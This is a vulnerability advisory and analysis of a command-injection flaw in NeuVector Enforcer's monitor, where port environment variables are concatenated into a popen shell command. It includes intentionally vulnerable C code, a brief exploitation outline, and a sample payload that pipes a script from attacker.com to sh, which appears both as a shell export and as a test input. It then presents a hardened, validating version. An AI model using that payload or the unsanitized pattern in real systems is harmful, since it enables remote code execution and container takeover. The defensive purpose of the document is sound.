The vulnerability exists in the NeuVector Enforcer's monitor process. When the container stops, the monitor uses `popen` to run a shell command that checks whether the Consul process's ports are still active. The command is built by directly concatenating the values of the `CLUSTER_RPC_PORT` and `CLUSTER_LAN_PORT` environment variables without sanitization. An attacker able to set or modify these variables can inject arbitrary commands by including shell metacharacters (semicolons, ampersands, backticks, pipes) in the port value. For instance, setting `CLUSTER_RPC_PORT="8080; malicious_command"` causes `malicious_command` to run with the privileges of the monitor process when `popen` is called, leading to full container compromise. In pseudocode, the flawed construction resembles `popen("netstat -tulpn | grep :" + CLUSTER_RPC_PORT + " | wc -l")`. The patched version validates that these variables contain only numeric characters before using them.
Platform: NeuVector
Version: <5.4.7
Vulnerability: Command Injection
Severity: Critical
date: 2024
Prediction: Patch available
What Undercode Says:
# Checking for vulnerable versions (image tag of the running enforcer container)
docker ps --filter "name=neuvector.enforcer" --format "table {{.Image}}"
# Example malicious environment variable setting
export CLUSTER_RPC_PORT="9999; curl http://attacker.com/exploit.sh | sh"
# Simulating the flawed popen call to show how the shell sees the injected command
echo "netstat -tulpn | grep :$CLUSTER_RPC_PORT | wc -l"
// Example of vulnerable code pattern (intentionally keeps the unsanitized
// concatenation described above; only the compile errors are fixed)
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char command[256];
    // Value comes straight from the environment: untrusted and unvalidated
    const char *port = getenv("CLUSTER_RPC_PORT");
    if (port == NULL)
        return 1;
    // Any shell metacharacters in `port` become part of the command line
    snprintf(command, sizeof command, "netstat -tulpn | grep :%s | wc -l", port);
    FILE *fp = popen(command, "r");   // /bin/sh -c executes the injected command
    if (fp != NULL)
        pclose(fp);
    return 0;
}
How to Exploit:
Set malicious environment variables. Inject commands via port values. Trigger container stop.
Protection from this CVE:
Upgrade to v5.4.7+. Validate environment variables. Sanitize input for popen.
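The C program below is an added example, not NeuVector's code or its patch. It puts the vulnerable build-the-command pattern described above next to a hardened version that lets the environment value reach `popen` only after it has been validated as a decimal port number. It goes slightly beyond the "only numerical characters" check the page describes by also enforcing the 1..65535 range and rejecting leading zeros. The function names, the buffer size and the sample inputs (including the injection string) are assumptions constructed for this example.

```c
/*
 * Added example, not NeuVector's code: the unsanitized pattern from the
 * write-up beside a hardened version that validates the port first.
 * Function names, CMD_MAX and the sample inputs are assumptions.
 */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CMD_MAX 128

/* Vulnerable pattern: the env value is spliced into the shell string as-is.
 * Returns 0 on success, -1 if the value is missing or the buffer is too small. */
int build_probe_command_vulnerable(char *buf, size_t len, const char *port_str)
{
    if (port_str == NULL)
        return -1;
    int n = snprintf(buf, len, "netstat -tulpn | grep :%s | wc -l", port_str);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Strict parse: 1..5 ASCII digits, no sign, no whitespace, no leading zero,
 * value in 1..65535. Returns 1 and stores the port on success, 0 otherwise. */
int parse_port(const char *s, unsigned *port_out)
{
    if (s == NULL || *s == '\0')
        return 0;
    size_t n = strlen(s);
    if (n > 5 || s[0] == '0')          /* too long, "0", or "08080" */
        return 0;
    unsigned long v = 0;
    for (size_t i = 0; i < n; i++) {
        if (!isdigit((unsigned char)s[i]))
            return 0;                  /* "8080; cmd", "8080`id`", "80 80" fail here */
        v = v * 10 + (unsigned long)(s[i] - '0');
    }
    if (v < 1 || v > 65535)
        return 0;
    *port_out = (unsigned)v;
    return 1;
}

/* Yes/no wrapper for callers that only need to gate on the env value. */
int port_env_is_safe(const char *s)
{
    unsigned p;
    return parse_port(s, &p);
}

/* Hardened pattern: only the validated integer is formatted into the command,
 * so the shell never sees attacker-controlled bytes. */
int build_probe_command_hardened(char *buf, size_t len, const char *port_str)
{
    unsigned port;
    if (!parse_port(port_str, &port))
        return -1;
    int n = snprintf(buf, len, "netstat -tulpn | grep :%u | wc -l", port);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Runs the probe the way the monitor did, but only after validation.
 * Returns the listener count, or -1 if the value was rejected or popen failed. */
long count_listeners_hardened(const char *port_str)
{
    char cmd[CMD_MAX];
    if (build_probe_command_hardened(cmd, sizeof cmd, port_str) != 0)
        return -1;
    FILE *fp = popen(cmd, "r");
    if (fp == NULL)
        return -1;
    char line[32];
    long count = -1;
    if (fgets(line, sizeof line, fp) != NULL)
        count = strtol(line, NULL, 10);
    pclose(fp);
    return count;
}

int main(void)
{
    /* Constructed inputs: a benign port, the injection string from the write-up,
     * a backtick variant, an out-of-range value and an empty value. */
    const char *inputs[] = { "8080", "8080; curl http://attacker.com/exploit.sh | sh",
                             "8080`id`", "99999", "", NULL };
    char cmd[CMD_MAX];
    for (size_t i = 0; inputs[i] != NULL; i++) {
        int v = build_probe_command_vulnerable(cmd, sizeof cmd, inputs[i]);
        printf("vulnerable: %-48s -> %s\n", inputs[i], v == 0 ? cmd : "(rejected)");
        int h = build_probe_command_hardened(cmd, sizeof cmd, inputs[i]);
        printf("hardened  : %-48s -> %s\n", inputs[i], h == 0 ? cmd : "(rejected)");
    }
    printf("listeners on 8080 (validated probe): %ld\n", count_listeners_hardened("8080"));
    return 0;
}
```

Note that the hardened builder still shells out; validation is what closes the injection, because the only bytes that reach the format string are the decimal digits of an integer the code itself produced. A stricter design would drop the shell pipeline entirely (for example by reading the socket table directly), but the validation shown is the minimal change the page's description of the fix corresponds to.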
Impact:
Container compromise. Privilege escalation. Cluster access.
Sources:
Reported By: github.com